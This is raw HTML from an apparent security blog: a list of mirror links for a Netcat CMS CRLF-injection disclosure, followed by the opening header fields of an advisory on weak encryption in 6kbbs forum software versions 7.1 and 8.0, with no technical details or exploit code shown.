<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/03/07/3"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/03/07/3</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Mar/36"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Mar/36</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://marc.info/?l=full-disclosure&m=142576233403004&w=4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://marc.info/?l=full-disclosure&m=142576233403004&w=4</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01768.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01768.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/03/netcat-cms-multiple-http-response.html</span></a></div>
<div style="margin: 0px;">
<a href="http://essayjeans.blog.163.com/blog/static/23717307420155142423197/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.blog.163.com/blog/static/23717307420155142423197/</span></a></div>
<div style="margin: 0px;">
<a href="http://computerobsess.blogspot.com/2015/06/osvdb-119342-netcat-crlf.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2015/06/osvdb-119342-netcat-crlf.html</span></a></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/bugs/netcat-cms-crlf</span></a></div>
<div style="margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/234603051201551423749286/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551423749286/</span></a></div>
<div style="margin: 0px;">
<a href="https://webtechwire.wordpress.com/2015/03/14/osvdb-119342-netcat-crlf/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://webtechwire.wordpress.com/2015/03/14/osvdb-119342-netcat-crlf/</span></a></div>
<div style="margin: 0px;">
<a href="https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itswift.wordpress.com/2015/03/07/netcat-cms-multiple-http-re</span></a></div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/http-response-splitting-vulnerability/netcat-cms-multiple</span></a></div>
<div style="margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-multiple-http-response-splitting-crlf-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-46247779113746114202015-06-13T23:12:00.000-07:002015-06-13T23:12:30.884-07:00 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHifEFetS5cei5AkN_legTOD9aTKXSBU5OBWEJoiS_2bI5wazCOYKkEFxmEhWItitvfmxXeMsrffhBd1rnYFu3BUVMWA6_549aCepIde7j_DSrUnlIP6hn9p8soTs0ZMrpq_5gqTKax0c/s1600/6kbbs_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHifEFetS5cei5AkN_legTOD9aTKXSBU5OBWEJoiS_2bI5wazCOYKkEFxmEhWItitvfmxXeMsrffhBd1rnYFu3BUVMWA6_549aCepIde7j_DSrUnlIP6hn9p8soTs0ZMrpq_5gqTKax0c/s400/6kbbs_1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor: 6kbbs</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product: 6kbbs</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: v7.1 v8.0</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Tested Version: v7.1 v8.0</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Advisory Publication: June 08, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Latest Update: June 10, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Inadequate Encryption Strength [CWE-326]</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">CVSS Severity (version 2.0):</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Discover and Reporter: Wang Jing [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (<a href="https://twitter.com/justqdjing/status/608928069663850497">@justqdjing</a>)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Recommendation Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Versions:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">v7.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">v8.0</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor URL & download:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs can be gain from here,</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.6kbbs.com/download.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://www.6kbbs.com/download.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
